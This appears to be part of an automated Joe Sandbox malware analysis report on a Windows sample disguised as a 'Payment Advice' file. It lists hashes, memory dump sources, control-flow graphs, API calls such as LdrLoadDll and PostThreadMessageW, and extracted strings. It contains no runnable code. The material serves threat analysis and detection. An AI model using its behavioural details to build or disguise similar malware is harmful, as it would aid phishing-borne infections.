                                                                                                                                            • Instruction ID: 4cea7463ce4719a882b833ff1f25651d375fed594b5576124a4763cf73c44c1d
                                                                                                                                            • Opcode Fuzzy Hash: 8aa4cfff33167981efc85d5e78babb6d2fd5ba939e3868e98c8185419a10dbe1
                                                                                                                                            • Instruction Fuzzy Hash: 2AD01235140004AFCB41EF24D486CD97BA5EF05220B01C0A5FD598F722C335D9179B80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 148d027902b4a279bef4f3b9a879aa7802ecbf98369b505a4636c59328d3cf8f
                                                                                                                                            • Instruction ID: e54c415a24d176fcb7bb12d2d1009dbacdd96428d5a6b309bbc810fa74480717
                                                                                                                                            • Opcode Fuzzy Hash: 148d027902b4a279bef4f3b9a879aa7802ecbf98369b505a4636c59328d3cf8f
                                                                                                                                            • Instruction Fuzzy Hash: 17E01778A40109CFDB14CFA4D1A9AEDBFB0EF0C300F20841AE512EB261CB34A845CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2d33350db8856c60635cd65c54022f7f15df8a704e3aa1a9ebd3db7428718807
                                                                                                                                            • Instruction ID: ec3305f5161db1a0f9491019dcb384ae86a5a5431f4785112584dbbcaef4b19f
                                                                                                                                            • Opcode Fuzzy Hash: 2d33350db8856c60635cd65c54022f7f15df8a704e3aa1a9ebd3db7428718807
                                                                                                                                            • Instruction Fuzzy Hash: 10B09B2131513913D608319D64206BE728DC7C5569F400067960D877454DC5AD5202EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                            • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                                                            • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                            • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1881084549.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4da0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                            • API String ID: 0-3486158592
                                                                                                                                            • Opcode ID: fc7378cdd22edc21bef6759819787ca9f05bf2200300a8abef1fe3999e60369e
                                                                                                                                            • Instruction ID: 5e61c120fd719342567dab61d19243199b82e23f2c26bac0b731dab41aee3dc3
                                                                                                                                            • Opcode Fuzzy Hash: fc7378cdd22edc21bef6759819787ca9f05bf2200300a8abef1fe3999e60369e
                                                                                                                                            • Instruction Fuzzy Hash: CBD1F831D2065A8ACB01EB64D990AADF7B1FFD5300F50C79AE50937264FB70AAC5CB41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1866175900.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_25b0000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a9d42dfb67bae3b6ed61518de21afe5aa3f1f3b4a41000b1f5d093fd789de332
                                                                                                                                            • Instruction ID: 636cec0c62a43798538af997566767c9c23a0648bdd9984bf059a3fcb1bdf714
                                                                                                                                            • Opcode Fuzzy Hash: a9d42dfb67bae3b6ed61518de21afe5aa3f1f3b4a41000b1f5d093fd789de332
                                                                                                                                            • Instruction Fuzzy Hash: 43A15D36A002099FCF06DFB4D8445EEBBB2FF84300B15456AE905AB265DB35ED55CF80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1879893931.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_4d50000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6710a84fc0859f64f8c38501b58de1b5af0a4b7864a78fa8b4b13d5f72ac3016
                                                                                                                                            • Instruction ID: 5579e1bbd85bae7d2d2de86c7ecef2afd00474e1411a9009c3d3fc7ad277785f
                                                                                                                                            • Opcode Fuzzy Hash: 6710a84fc0859f64f8c38501b58de1b5af0a4b7864a78fa8b4b13d5f72ac3016
                                                                                                                                            • Instruction Fuzzy Hash: A7C1F7BB801746BAD712CF25EA4C3897BB1FB85318B584209D1616B6E4DFBC1D4ACF84

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                            Signature Coverage:8.2%
                                                                                                                                            Total number of Nodes:147
                                                                                                                                            Total number of Limit Nodes:14

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 329 417dc3-417dec call 42fa53 332 417df2-417e00 call 430053 329->332 333 417dee-417df1 329->333 336 417e10-417e21 call 42e4f3 332->336 337 417e02-417e0d call 4302f3 332->337 342 417e23-417e37 LdrLoadDll 336->342 343 417e3a-417e3d 336->343 337->336 342->343
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 354 42cd93-42cdcf call 404943 call 42e003 NtClose
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDCA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4145c0-4145cb 1 4145bb-4145bc 0->1 2 4145cd-4145d2 0->2 3 4145a4 2->3 4 4145d4-4145e6 2->4 7 414616-414628 call 42ef13 3->7 8 4145a6-4145ac 3->8 5 4145e8-4145f0 4->5 6 41462a-414633 call 42f923 4->6 9 414612 5->9 10 4145f2-4145f4 5->10 17 414634 6->17 7->6 15 414614 9->15 16 414669-41466c 9->16 13 414601-414607 10->13 14 4145f6 10->14 14->17 18 4145f8-414600 14->18 15->7 19 414635-414666 call 417dc3 call 4048b3 call 425503 16->19 20 41466d-41467d 16->20 17->5 18->13 19->16 21 41469d-4146a3 20->21 22 41467f-41468e PostThreadMessageW 20->22 22->21 27 414690-41469a 22->27 27->21
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 31 414595-4145a4 33 414616-414633 call 42ef13 call 42f923 31->33 34 4145a6-4145ac 31->34 38 414634 33->38 40 414612 38->40 41 4145f2-4145f4 38->41 44 414614 40->44 45 414669-41466c 40->45 42 414601-414607 41->42 43 4145f6 41->43 43->38 46 4145f8-414600 43->46 44->33 47 414635-414666 call 417dc3 call 4048b3 call 425503 45->47 48 41466d-41467d 45->48 46->42 47->45 49 41469d-4146a3 48->49 50 41467f-41468e PostThreadMessageW 48->50 50->49 55 414690-41469a 50->55 55->49
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 59 41460a-41460e 60 414610 59->60 61 414684-41468e PostThreadMessageW 59->61 64 414612 60->64 62 414690-41469a 61->62 63 41469d-4146a3 61->63 62->63 65 414614-414633 call 42ef13 call 42f923 64->65 66 414669-41466c 64->66 78 414634 65->78 67 414635-414666 call 417dc3 call 4048b3 call 425503 66->67 68 41466d-41467d 66->68 67->66 68->63 70 41467f-414683 68->70 70->61 78->64 81 4145f2-4145f4 78->81 83 414601-414607 81->83 84 4145f6 81->84 84->78 85 4145f8-414600 84->85 85->83
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 86 414613-414614 87 414616-414633 call 42ef13 call 42f923 86->87 91 414634 87->91 93 414612 91->93 94 4145f2-4145f4 91->94 97 414614 93->97 98 414669-41466c 93->98 95 414601-414607 94->95 96 4145f6 94->96 96->91 99 4145f8-414600 96->99 97->87 100 414635-414646 call 417dc3 98->100 101 41466d-41467d 98->101 99->95 106 41464b-414666 call 4048b3 call 425503 100->106 102 41469d-4146a3 101->102 103 41467f-41468e PostThreadMessageW 101->103 103->102 108 414690-41469a 103->108 106->98 108->102
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 300 417db6-417dbe 302 417dc1 300->302 303 417dfb-417e00 300->303 304 417dc3-417dec call 42fa53 302->304 305 417d74-417d7a 302->305 306 417e10-417e21 call 42e4f3 303->306 307 417e02-417e0d call 4302f3 303->307 317 417df2-417df6 call 430053 304->317 318 417dee-417df1 304->318 310 417d73-417d7a 305->310 311 417d7c-417d8d call 417ae3 305->311 320 417e23-417e37 LdrLoadDll 306->320 321 417e3a-417e3d 306->321 307->306 310->310 310->311 323 417db2-417db5 311->323 324 417d8f-417d93 311->324 317->303 320->321 325 417d96-417d9d 324->325 325->325 326 417d9f-417da2 325->326 326->323 327 417da4-417da6 326->327 328 417da9-417db0 327->328 328->323 328->328
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 344 42d0c3-42d104 call 404943 call 42e003 RtlAllocateHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041EBBE,?,?,00000000,?,0041EBBE,?,?,?), ref: 0042D0FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 349 42d113-42d154 call 404943 call 42e003 RtlFreeHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,00417628,000000F4), ref: 0042D14F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 359 42d163-42d19c call 404943 call 42e003 ExitProcess
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,C8E77539,?,?,C8E77539), ref: 0042D197
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 364 16e2c0a-16e2c0f 365 16e2c1f-16e2c26 LdrInitializeThunk 364->365 366 16e2c11-16e2c18 364->366
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                            Strings
                                                                                                                                            • Critical section address, xrefs: 01715425, 017154BC, 01715534
                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01715543
                                                                                                                                            • undeleted critical section in freed memory, xrefs: 0171542B
                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017154CE
                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 017154B6
                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017154E2
                                                                                                                                            • Address of the debug info found in the active list., xrefs: 017154AE, 017154FA
                                                                                                                                            • Critical section address., xrefs: 01715502
                                                                                                                                            • 8, xrefs: 017152E3
                                                                                                                                            • Critical section debug info address, xrefs: 0171541F, 0171552E
                                                                                                                                            • Thread identifier, xrefs: 0171553A
                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0171540A, 01715496, 01715519
                                                                                                                                            • double initialized or corrupted critical section, xrefs: 01715508
                                                                                                                                            • corrupted critical section, xrefs: 017154C2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                            Strings
                                                                                                                                            • @, xrefs: 0171259B
                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01712498
                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017124C0
                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01712409
                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01712412
                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017122E4
                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0171261F
                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01712506
                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01712602
                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017125EB
                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01712624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                            Strings
                                                                                                                                            • VerifierDebug, xrefs: 01728CA5
                                                                                                                                            • HandleTraces, xrefs: 01728C8F
                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01728B8F
                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01728A3D
                                                                                                                                            • VerifierDlls, xrefs: 01728CBD
                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01728A67
                                                                                                                                            • VerifierFlags, xrefs: 01728C50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
